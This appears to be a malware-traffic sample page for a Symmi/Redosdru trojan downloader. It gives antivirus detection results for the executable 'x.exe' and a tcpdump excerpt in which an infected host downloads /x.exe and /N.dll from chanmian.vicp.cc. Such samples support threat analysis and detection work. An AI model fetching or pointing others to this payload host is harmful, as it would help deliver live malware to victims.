Symmi/Redosdru Malware Trojan Downloader PCAP file download traffic sample chanmian.vicp.cc

Attachment: 1 pcap (76 KB), added December 16, 2016 7:07 am by admin; 91 downloads.
Antivirus scan results for the downloaded executable:

SHA256: 87fca1b51945745dbdeb343b2e1f84032fcd36471145a6f50df4493ed0ee7475
File name: x.exe
Detection ratio: 43 / 55
Analysis date: 2016-12-16 07:01:54 UTC

Engine                   Detection name                                  Signature date
ALYac                    Gen:Variant.Symmi.29124                         20161216
AVG                      Downloader.Generic14.AESC                       20161215
AVware                   Trojan.Win32.Generic!BT                         20161216
Ad-Aware                 Gen:Variant.Symmi.29124                         20161216
AegisLab                 Troj.W32.Gen.lYYu                               20161215
Antiy-AVL                Trojan[Backdoor]/Win32.Farfli                   20161216
Arcabit                  Trojan.Symmi.D71C4                              20161216
Avast                    Win32:Dropper-OHP [Trj]                         20161216
Avira (no cloud)         TR/AD.Redosdru.tyrmh                            20161216
Baidu                    Win32.Trojan-Downloader.Agent.cw                20161207
BitDefender              Gen:Variant.Symmi.29124                         20161216
Bkav                     W32.eHeur.Malware10                             20161215
CAT-QuickHeal            Trojan.Redosdru.29891                           20161216
Comodo                   TrojWare.Win32.Redosdru.A                       20161216
CrowdStrike Falcon (ML)  malicious_confidence_100% (W)                   20161024
ESET-NOD32               a variant of Win32/TrojanDownloader.Agent.CFM   20161216
Emsisoft                 Gen:Variant.Symmi.29124 (B)                     20161216

Packet capture excerpt (tcpdump output; raw packet byte dumps omitted, HTTP request text kept):

2016-12-16 00:53:05.808394 IP 192.168.1.102.49938 > 103.42.31.110.80: Flags [P.], seq 0:319, ack 1, win 256, length 319: HTTP: GET /x.exe HTTP/1.1
GET /x.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: chanmian.vicp.cc
Connection: Keep-Alive
Cookie: HFS_SID_=0.84990619821474

2016-12-16 00:54:22.726261 IP 192.168.1.102.63864 > 75.75.75.75.53: 1198+ A? chanmian.vicp.cc. (34)
2016-12-16 00:54:23.743419 IP 192.168.1.102.63865 > 75.75.75.75.53: 1198+ A? chanmian.vicp.cc. (34)
2016-12-16 00:54:24.049721 IP 192.168.1.102.49950 > 103.42.31.110.80: Flags [S], seq 2143463710, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 00:54:24.310775 IP 192.168.1.102.49950 > 103.42.31.110.80: Flags [.], ack 1463017123, win 256, length 0
2016-12-16 00:54:24.311282 IP 192.168.1.102.49950 > 103.42.31.110.80: Flags [P.], seq 0:110, ack 1, win 256, length 110: HTTP: GET /N.dll HTTP/1.1
GET /N.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: chanmian.vicp.cc
Cache-Control: no-cache
